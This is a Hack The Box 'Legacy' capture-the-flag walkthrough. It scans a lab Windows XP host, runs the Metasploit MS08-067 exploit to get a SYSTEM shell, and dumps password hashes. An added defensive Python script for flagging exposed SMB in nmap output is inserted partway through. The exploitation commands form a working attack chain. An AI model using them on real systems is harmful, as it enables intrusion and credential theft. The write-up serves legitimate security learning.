Legacy
HTB - 1. Legacy
nmap -A -T4 -p- 10.10.10.4
Result: ports 139 and 445 open, running Windows XP, computer name LEGACY, message_signing disabled.
smbclient -L \\10.10.10.4\\
Result: no connection
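A defender-side check on the same kind of scan output, as an added example that is not part of the original write-up: it parses nmap normal output and flags the conditions noted above (SMB ports reachable, an end-of-life Windows version, message signing disabled). The sample text, the second host 192.0.2.20 and the EOL_OS list are constructed assumptions.

```python
import re

# Constructed sample in the style of nmap's normal output for the findings
# named above (not the actual scan from this write-up).
SAMPLE = """\
Nmap scan report for 10.10.10.4
PORT    STATE SERVICE      VERSION
139/tcp open  netbios-ssn  Microsoft Windows netbios-ssn
445/tcp open  microsoft-ds Windows XP microsoft-ds
Host script results:
| smb-os-discovery:
|   OS: Windows XP (Windows 2000 LAN Manager)
|_  Computer name: legacy
| smb-security-mode:
|_  message_signing: disabled (dangerous, but default)
Nmap scan report for 192.0.2.20
PORT    STATE SERVICE VERSION
445/tcp open  microsoft-ds
Host script results:
| smb-security-mode:
|_  message_signing: required
"""

EOL_OS = ("Windows XP", "Windows 2000", "Windows Server 2003")  # assumed list
SMB_PORTS = {139, 445}

def audit(nmap_text):
    """Return {host: [findings]} for SMB exposure seen in nmap normal output."""
    hosts, cur = {}, None
    for line in nmap_text.splitlines():
        m = re.match(r"Nmap scan report for (?:\S+ \()?([\d.]+)\)?", line)
        if m:  # a new host section starts here
            cur = hosts.setdefault(m.group(1), [])
            continue
        if cur is None:
            continue
        m = re.match(r"(\d+)/tcp\s+open\b", line)
        if m and int(m.group(1)) in SMB_PORTS:
            cur.append(f"SMB port {m.group(1)}/tcp reachable")
        m = re.search(r"\bOS: (.+)$", line)  # smb-os-discovery line
        if m and m.group(1).startswith(EOL_OS):
            cur.append(f"end-of-life OS: {m.group(1)}")
        if re.search(r"message_signing:\s*disabled", line):
            cur.append("SMB message signing disabled")
    return {h: f for h, f in hosts.items() if f}

if __name__ == "__main__":
    for host, findings in audit(SAMPLE).items():
        print(host, "->", "; ".join(findings))
```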
Metasploit
sudo msfconsole
search smb_version
use auxiliary/scanner/smb/smb_version
options
set rhosts 10.10.10.4
exploit
Result: running Windows XP SP3
Searching for "smb windows xp sp3 exploit" found https://www.rapid7.com/db/modules/exploit/windows/smb/ms08_067_netapi
Metasploit Exploit
use exploit/windows/smb/ms08_067_netapi
set rhosts 10.10.10.4
run
getuid
sysinfo
help
hashdump
shell
Result: shell spawned as NT AUTHORITY\SYSTEM (root equivalent); hashdump gives password hashes.
Admin Flag at C:\Documents and Settings\Administrator\Desktop\root.txt
User Flag at C:\Documents and Settings\john\Desktop\user.txt